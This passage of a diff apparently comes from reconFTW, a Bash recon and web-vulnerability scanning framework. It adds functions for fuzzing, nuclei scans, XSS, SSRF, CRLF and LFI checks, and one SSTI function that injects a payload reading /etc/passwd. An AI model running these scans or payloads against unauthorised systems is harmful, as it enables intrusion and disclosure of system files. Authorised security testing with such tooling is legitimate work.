.tmp/nmap_grep.gnmap $DEBUG_STD + fi + + end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} + else + if [ "$PORTSCANNER" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function cloudprovider(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CLOUD_IP" = true ] + then + start_func "Cloud provider check" + cd $tools/ip2provider + eval cat $dir/hosts/ips.txt | ./ip2provider.py | anew -q $dir/hosts/cloud_providers.txt $DEBUG_STD + cd $dir + end_func "Results are saved in hosts/cloud_providers.txt" ${FUNCNAME[0]} + else + if [ "$CLOUD_IP" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +############################################################################################################### +############################################# WEB SCAN ######################################################## +############################################################################################################### + +function waf_checks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WAF_DETECTION" = true ] + then + start_func "Website's WAF detection" + eval axiom-scan webs/webs.txt -m wafw00f -o .tmp/wafs.txt $DEBUG_STD + cat .tmp/wafs.txt | sed -e 's/^[ \t]*//' -e 's/ \+ /\t/g' -e '/(None)/d' | tr -s "\t" ";" > webs/webs_wafs.txt + NUMOFLINES=$(eval cat webs/webs_wafs.txt $DEBUG_ERROR | wc -l) + notification "${NUMOFLINES} websites protected by waf" info + end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]} + else + if [ "$WAF" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function nuclei_check(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$NUCLEICHECK" = true ] + then + start_func "Templates based web scanner" + eval nuclei -update-templates $DEBUG_STD + mkdir -p nuclei_output + printf "${yellow}\n Running : Nuclei Info${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity info -r $resolvers_trusted -o nuclei_output/info.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei Low${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity low -r $resolvers_trusted -o nuclei_output/low.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei Medium${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity medium -r $resolvers_trusted -o nuclei_output/medium.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei High${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity high -r $resolvers_trusted -o nuclei_output/high.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei Critical${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity critical -r $resolvers_trusted -o nuclei_output/critical.txt $DEBUG_STD + printf "\n\n" + end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} + else + if [ "$NUCLEICHECK" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function fuzz(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FUZZ" = true ] + then + start_func "Web directory fuzzing" + mkdir -p $dir/fuzzing + for sub in $(cat webs/webs.txt); do + printf "${yellow}\n\n Running: Fuzzing in ${sub}${reset}\n" + sub_out=$(echo $sub | sed -e 's|^[^/]*//||' -e 's|/.*$||') + ffuf -mc all -fc 404 -ac -t $FFUF_THREADS -sf -s -H "${HEADER}" -w $fuzz_wordlist -maxtime 900 -u $sub/FUZZ -or -o $dir/fuzzing/${sub_out}.tmp &>/dev/null + eval cat $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR | jq '[.results[]|{status: .status, length: .length, url: .url}]' | grep -oP "status\":\s(\d{3})|length\":\s(\d{1,7})|url\":\s\"(http[s]?:\/\/.*?)\"" | paste -d' ' - - - | awk '{print $2" "$4" "$6}' | sed 's/\"//g' | sort |anew -q $dir/fuzzing/${sub_out}.txt + eval rm $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR + done + end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} + else + if [ "$FUZZ" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function cms_scanner(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CMS_SCANNER" = true ] + then + start_func "CMS Scanner" + mkdir -p $dir/cms && rm -rf $dir/cms/* + tr '\n' ',' < webs/webs.txt > .tmp/cms.txt + eval python3 $tools/CMSeeK/cmseek.py -l .tmp/cms.txt --batch -r $DEBUG_STD + for sub in $(cat webs/webs.txt); do + sub_out=$(echo $sub | sed -e 's|^[^/]*//||' -e 's|/.*$||') + cms_id=$(eval cat $tools/CMSeeK/Result/${sub_out}/cms.json $DEBUG_ERROR | jq -r '.cms_id') + if [ -z "$cms_id" ] + then + rm -rf $tools/CMSeeK/Result/${sub_out} + else + mv -f $tools/CMSeeK/Result/${sub_out} $dir/cms/ + fi + done + end_func "Results are saved in cms/*subdomain* folder" ${FUNCNAME[0]} + else + if [ "$CMS_SCANNER" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function params(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PARAMS" = true ] + then + start_func "Parameter Discovery" + printf "${yellow}\n\n Running : Searching params with paramspider${reset}\n" + cat webs/webs.txt | sed -r "s/https?:\/\///" | anew -q .tmp/probed_nohttp.txt + eval axiom-scan .tmp/probed_nohttp.txt -m paramspider -l high -q --exclude eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt,js -o output_paramspider $DEBUG_STD + eval cat output_paramspider/*.txt $DEBUG_ERROR | anew -q .tmp/param_tmp.txt + sed '/^FUZZ/d' -i .tmp/param_tmp.txt + eval rm -rf output_paramspider/ $DEBUG_ERROR + if [ "$DEEP" = true ] ; then + printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" + eval axiom-scan .tmp/param_tmp.txt -m arjun -t $ARJUN_THREADS -o webs/param.txt $DEBUG_STD + else + if [[ $(cat .tmp/param_tmp.txt | wc -l) -le 50 ]] + then + printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" + eval axiom-scan .tmp/param_tmp.txt -m arjun -t $ARJUN_THREADS -o webs/param.txt $DEBUG_STD + else + cp .tmp/param_tmp.txt webs/param.txt + fi + fi + end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} + else + if [ "$PARAMS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function urlchecks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_CHECK" = true ] + then + start_func "URL Extraction" + mkdir -p js + + eval axiom-scan webs/webs.txt -m waybackurls -o .tmp/url_extract_way_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_way_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + eval axiom-scan webs/webs.txt -m gau -o .tmp/url_extract_gau_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_gau_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + + diff_webs=$(diff <(sort -u .tmp/probed_tmp.txt) <(sort -u webs/webs.txt) | wc -l) + if [ $diff_webs != "0" ] || [ ! -s ".tmp/gospider.txt" ] ; + then + if [ "$DEEP" = true ] ; then + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + else + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 2 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + fi + cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt + fi + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt + if [ -s "${GITHUB_TOKENS}" ] + then + eval github-endpoints -q -k -d $domain -t ${GITHUB_TOKENS} -o .tmp/github-endpoints.txt $DEBUG_STD + eval cat .tmp/github-endpoints.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + fi + eval cat .tmp/url_extract_tmp.txt webs/param.txt $DEBUG_ERROR | grep "${domain}" | grep "=" | eval qsreplace -a $DEBUG_ERROR | egrep -iv "\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|pdf|svg|txt|js)$" | anew -q .tmp/url_extract_tmp2.txt + cat .tmp/url_extract_tmp.txt | grep "${domain}" | egrep -i "\.(js)" | anew -q js/url_extract_js.txt + eval uddup -u .tmp/url_extract_tmp2.txt -o .tmp/url_extract_uddup.txt $DEBUG_STD + NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) + notification "${NUMOFLINES} new urls with params" info + end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi +} + +function url_gf(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_GF" = true ] + then + start_func "Vulnerable Pattern Search" + mkdir -p gf + gf xss webs/url_extract.txt | anew -q gf/xss.txt + gf ssti webs/url_extract.txt | anew -q gf/ssti.txt + gf ssrf webs/url_extract.txt | anew -q gf/ssrf.txt + gf sqli webs/url_extract.txt | anew -q gf/sqli.txt + gf redirect webs/url_extract.txt | anew -q gf/redirect.txt && cat gf/ssrf.txt | anew -q gf/redirect.txt + gf rce webs/url_extract.txt | anew -q gf/rce.txt + gf potential webs/url_extract.txt | cut -d ':' -f3-5 |anew -q gf/potential.txt + cat .tmp/url_extract_tmp.txt | egrep -iv "\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|pdf|svg|txt|js)$" | unfurl -u format %s://%d%p | anew -q gf/endpoints.txt + gf lfi webs/url_extract.txt | anew -q gf/lfi.txt + end_func "Results are saved in gf folder" ${FUNCNAME[0]} + else + if [ "$URL_GF" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function url_ext(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_EXT" = true ] + then + ext=("7z" "achee" "action" "adr" "apk" "arj" "ascx" "asmx" "asp" "aspx" "axd" "backup" "bak" "bat" "bin" "bkf" "bkp" "bok" "cab" "cer" "cfg" "cfm" "cfml" "cgi" "cnf" "conf" "config" "cpl" "crt" "csr" "csv" "dat" "db" "dbf" "deb" "dmg" "dmp" "doc" "docx" "drv" "email" "eml" "emlx" "env" "exe" "gadget" "gz" "html" "ica" "inf" "ini" "iso" "jar" "java" "jhtml" "json" "jsp" "key" "log" "lst" "mai" "mbox" "mbx" "md" "mdb" "msg" "msi" "nsf" "ods" "oft" "old" "ora" "ost" "pac" "passwd" "pcf" "pdf" "pem" "pgp" "php" "php3" "php4" "php5" "phtm" "phtml" "pkg" "pl" "plist" "pst" "pwd" "py" "rar" "rb" "rdp" "reg" "rpm" "rtf" "sav" "sh" "shtm" "shtml" "skr" "sql" "swf" "sys" "tar" "tar.gz" "tmp" "toast" "tpl" "txt" "url" "vcd" "vcf" "wml" "wpd" "wsdl" "wsf" "xls" "xlsm" "xlsx" "xml" "xsd" "yaml" "yml" "z" "zip") + echo "" > webs/url_extract.txt + for t in ${ext[@]}; do + NUMOFLINES=$(cat .tmp/url_extract_tmp.txt | egrep -i "\.(${t})($|\/|\?)" | sort -u | wc -l) + if [[ ${NUMOFLINES} -gt 0 ]]; then + echo -e "\n############################\n + ${t} + \n############################\n" >> webs/urls_by_ext.txt + cat .tmp/url_extract_tmp.txt | egrep -i "\.(${t})($|\/|\?)" | sort -u >> webs/urls_by_ext.txt + fi + done + end_func "Results are saved in webs/urls_by_ext.txt" ${FUNCNAME[0]} + else + if [ "$URL_EXT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function jschecks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$JSCHECKS" = true ] + then + start_func "Javascript Scan" + if [ -s "js/url_extract_js.txt" ] + then + printf "${yellow} Running : Fetching Urls 1/5${reset}\n" + cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt + cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt + printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" + eval axiom-scan js/jsfile_links.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt + printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" + interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + if [ -s ".tmp/js_endpoints.txt" ] + then + eval sed -i '/^\//!d' .tmp/js_endpoints.txt $DEBUG_STD + cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt + fi + printf "${yellow} Running : Gathering secrets 4/5${reset}\n" + eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD + printf "${yellow} Running : Building wordlist 5/5${reset}\n" + if [ -s "js/js_livelinks.txt" ] + then + cat js/js_livelinks.txt | eval python3 $tools/getjswords.py $DEBUG_ERROR | anew -q webs/dict_words.txt + fi + end_func "Results are saved in js folder" ${FUNCNAME[0]} + else + end_func "No JS urls found, function skipped" ${FUNCNAME[0]} + fi + else + if [ "$JSCHECKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function wordlist_gen(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WORDLIST" = true ] + then + start_func "Wordlist generation" + cat .tmp/url_extract_tmp.txt | unfurl -u keys | sed 's/[][]//g' | sed 's/[#]//g' | sed 's/[}{]//g' | anew -q webs/dict_words.txt + cat .tmp/url_extract_tmp.txt | unfurl -u values | sed 's/[][]//g' | sed 's/[#]//g' | sed 's/[}{]//g' | anew -q webs/dict_words.txt + cat .tmp/url_extract_tmp.txt | tr "[:punct:]" "\n" | anew -q webs/dict_words.txt + if [ -s ".tmp/js_endpoints.txt" ] + then + cat .tmp/js_endpoints.txt | unfurl -u path | anew -q webs/dict_paths.txt + fi + cat .tmp/url_extract_tmp.txt | unfurl -u path | anew -q webs/dict_paths.txt + end_func "Results are saved in webs/dict_[words|paths].txt" ${FUNCNAME[0]} + else + if [ "$WORDLIST" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +############################################################################################################### +######################################### VULNERABILITIES ##################################################### +############################################################################################################### + +function brokenLinks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BROKENLINKS" = true ] ; then + start_func "Broken links checks" + if [ ! -s ".tmp/gospider.txt" ] ; + then + if [ "$DEEP" = true ] ; then + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + else + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 2 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + fi + cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt + fi + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l) + notification "${NUMOFLINES} new broken links found" info + end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} + else + if [ "$BROKENLINKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function xss(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$XSS" = true ] && [ -s "gf/xss.txt" ] + then + start_func "XSS Analysis" + cat gf/xss.txt | qsreplace FUZZ | Gxss -c 100 -p Xss | anew -q .tmp/xss_reflected.txt + if [ "$DEEP" = true ] ; then + if [ -n "$XSS_SERVER" ]; then + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav -b ${XSS_SERVER} -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + else + printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n" + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + fi + else + if [[ $(cat .tmp/xss_reflected.txt | wc -l) -le 500 ]] + then + if [ -n "$XSS_SERVER" ]; then + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav --skip-grepping --skip-mining-all --skip-mining-dict -b ${XSS_SERVER} -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + else + printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n" + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav --skip-grepping --skip-mining-all --skip-mining-dict -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + fi + else + printf "${bred} Skipping XSS: Too Much URLs to test, try with --deep flag${reset}\n" + fi + fi + end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]} + else + if [ "$XSS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/xss.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to XSS ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function cors(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CORS" = true ] + then + start_func "CORS Scan" + eval python3 $tools/Corsy/corsy.py -i webs/webs.txt > webs/cors.txt $DEBUG_STD + eval cat webs/cors.txt $DEBUG_ERROR + end_func "Results are saved in webs/cors.txt" ${FUNCNAME[0]} + else + if [ "$CORS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function open_redirect(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$OPEN_REDIRECT" = true ] && [ -s "gf/redirect.txt" ] + then + start_func "Open redirects checks" + if [ "$DEEP" = true ] ; then + cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt + eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt + sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt + end_func "Results are saved in vulns/redirect.txt" ${FUNCNAME[0]} + else + if [[ $(cat gf/redirect.txt | wc -l) -le 1000 ]] + then + cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt + eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt + sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt + end_func "Results are saved in vulns/redirect.txt" ${FUNCNAME[0]} + else + printf "${bred} Skipping Open redirects: Too Much URLs to test, try with --deep flag${reset}\n" + printf "${bgreen}#######################################################################${reset}\n" + fi + fi + else + if [ "$OPEN_REDIRECT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/redirect.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to Open Redirect ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function ssrf_checks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSRF_CHECKS" = true ] && [ -s "gf/ssrf.txt" ] + then + if [ -n "$COLLAB_SERVER" ]; then + start_func "SSRF checks" + if [ "$DEEP" = true ] ; then + cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt + COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") + echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt + echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt + for url in $(cat .tmp/tmp_ssrf.txt); do + ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt + done + eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} + else + if [[ $(cat gf/ssrf.txt | wc -l) -le 1000 ]] + then + cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt + COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") + echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt + echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt + for url in $(cat .tmp/tmp_ssrf.txt); do + ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt + done + eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} + else + printf "${bred} Skipping SSRF: Too Much URLs to test, try with --deep flag${reset}\n" + fi + fi + else + notification "No COLLAB_SERVER defined" error + end_func "Skipping function" ${FUNCNAME[0]} + printf "${bgreen}#######################################################################${reset}\n" + fi + else + if [ "$SSRF_CHECKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/ssrf.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSRF ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function crlf_checks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CRLF_CHECKS" = true ] + then + start_func "CRLF checks" + eval crlfuzz -l webs/webs.txt -o vulns/crlf.txt $DEBUG_STD + end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]} + else + if [ "$CRLF_CHECKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function lfi(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$LFI" = true ] && [ -s "gf/lfi.txt" ] + then + start_func "LFI checks" + cat gf/lfi.txt | qsreplace FUZZ | anew -q .tmp/tmp_lfi.txt + for url in $(cat .tmp/tmp_lfi.txt); do + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt + done + end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]} + else + if [ "$LFI" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/lfi.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to LFI ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function ssti(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSTI" = true ] && [ -s "gf/ssti.txt" ] + then + start_func "SSTI checks" + cat gf/ssti.txt | qsreplace "ssti{{7*7}}" | anew -q .tmp/ssti_fuzz.txt + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt + cat gf/ssti.txt | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | anew -q .tmp/ssti_fuzz2.txt + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt + end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]} + else + if [ "$SSTI" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/ssti.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSTI ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete 